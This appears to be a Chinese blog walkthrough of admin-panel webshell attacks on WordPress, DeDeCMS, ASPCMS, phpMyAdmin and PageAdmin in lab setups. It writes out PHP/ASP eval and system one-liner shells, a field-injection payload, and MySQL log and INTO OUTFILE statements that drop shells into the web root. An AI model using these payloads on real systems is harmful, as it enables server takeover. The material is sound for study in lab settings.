常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)

目录

一:WordPress

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...

步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php

步骤三:访问以下连接即可获取WebShel...

姿势二:上传主题拿WebShell

步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】

步骤二:安装成功后访问主题下的网站后门文件..

二:DeDeCMS

姿势一:通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...

步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代

码上传...OK

步骤三:访问上传成功后的文件并使用蚁剑连接测试...

姿势二:修改模板文件拿WebShel

步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下

步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...

步骤三:使用蚁剑进行连接测试.

姿势三:后台任意命令执行拿WebShell

步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

步骤三:使用蚁剑连接测试...

三:ASPCMS

姿势一:后台修改配置文件拿Shell

步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)

步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包

步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...

步骤四:访问以下地址进行连接...

四、PHPMyadmin

姿势⼀:通过⽇志⽂件拿Shell

姿势⼆:导⼊导出拿WebShell

1.首先判断mysql位置

2.猜测web路径

3.写webshell

4.浏览器

姿势三:界面图像化GetShell

五、Pageadmin

步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。

步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】

步骤三:解压文件。

步骤四:使用工具连接。


一:WordPress

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...

#执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

#靶场地址

http://192.168.4.176:8080/wp-admin/

步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php

在其404模板中插入一句话木马代码.点击【更新文件】按钮

<?php eval($ POST['cmd']);?>

步骤三:访问以下连接即可获取WebShel...

#拼接路径

/wp-content/themes/twentyfifteen/404.php

#访问连接

http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php

http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php

菜刀连接:

姿势二:上传主题拿WebShell

步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】

主题文件

步骤二:安装成功后访问主题下的网站后门文件..

#拼接路径

/wp-content/themes/ Farallon-develop-v0.3.8/shell.php

#访问地址

http://192.168.4.176:8080/wp-content/themes/ Farallon-develop-v0.3.8/shell.php

#蚁剑连接

二:DeDeCMS

漏洞复现

姿势一:通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...

#前台

http://192.168.4.139/dedecms/index.php?upcache=1

http://192.168.4.139/dedecms/index.php?upcache=1

http://192.168.4.139/dedecms/index.php?upcache=1

#后台

http://192.168.4.139/dedecms/dede/

http://192.168.4.139/dedecms/dede/

http://192.168.4.139/dedecms/dede/

#信息

username:admin

password:admin

步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代

码上传...OK

步骤三:访问上传成功后的文件并使用蚁剑连接测试...

#文件地址

http://127.0.0.1/uploads/uploads/shell.php

http://127.0.0.1/uploads/uploads/shell.php

http://127.0.0.1/uploads/uploads/shell.php

姿势二:修改模板文件拿WebShel

步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下

步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...

步骤三:使用蚁剑进行连接测试.

#地址

http://127.0.0.1/uploads/index.php

http://127.0.0.1/uploads/index.php

http://127.0.0.1/uploads/index.php

姿势三:后台任意命令执行拿WebShell

步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

http://127.0.0.1/dedecms/plus/ad js.php?aid=1

步骤三:使用蚁剑连接测试...

三:ASPCMS

  ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。

漏洞复现

姿势一:后台修改配置文件拿Shell

步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)

#网站后台

http://192.168.4.139/admin_aspcms/login.asp //全功能版本

#账户密码

username:admin

password:123456

步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包

步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...

#字段值

1%25><%25Eval(Request(chr(65)))%25><%25 #密码是a

#影响文件

/config/AspCms _Config.asp

步骤四:访问以下地址进行连接...

http://192.168.207.130:81/config//AspCms_Config.asp

四、PHPMyadmin

姿势⼀:通过⽇志⽂件拿Shell

  利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell 。

show global variables like '%general%';

set global general_log='on';

set global general_log_file = 'E:/phpstudy_pro/WWW/mafa.php'

select '<?php phpinfo();?>';

php代码执行成功!

姿势⼆:导⼊导出拿WebShell

思路:通过SQL语句拿webshell ⽤into outfile把后⻔写到⽹站⽬录上。

1.首先判断mysql位置

select @@datadir

路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\

2.猜测web路径

猜测web路径: E:\phpstudy_pro\WWW

E:\phpstudy\WWW\web.php

3.写webshell

select "<?php phpinfo(); eval($_POST[a]);?>" into outfile 'E:/phpstudy_pro/WWW/a.php ';

select "<?php phpinfo(); system($_GET[a]);?>" into outfile 'E:/phpstudy_pro/WWW/b.php';

4.浏览器

http://127.0.0.1/b.php?a=dir ..\

备注:/

不要用\,如里要用\\(转义)

姿势三:界面图像化GetShell

如果过滤了 into outfile 第一种的图形化操作..

phpmyadmin管理台

变量:日志 搜索:gen

log:on

file: E:/phpstudy_pro/WWW/mafa.php

sql:

select “<?php eval($_POST[‘cmd’]);?>”;

五、Pageadmin

  PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。

源码⽂件+MSSQL(SA/Rsec123456)

登录到管理员后台

步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。

步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】

步骤三:解压文件。

步骤四:使用工具连接。

  • 19
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值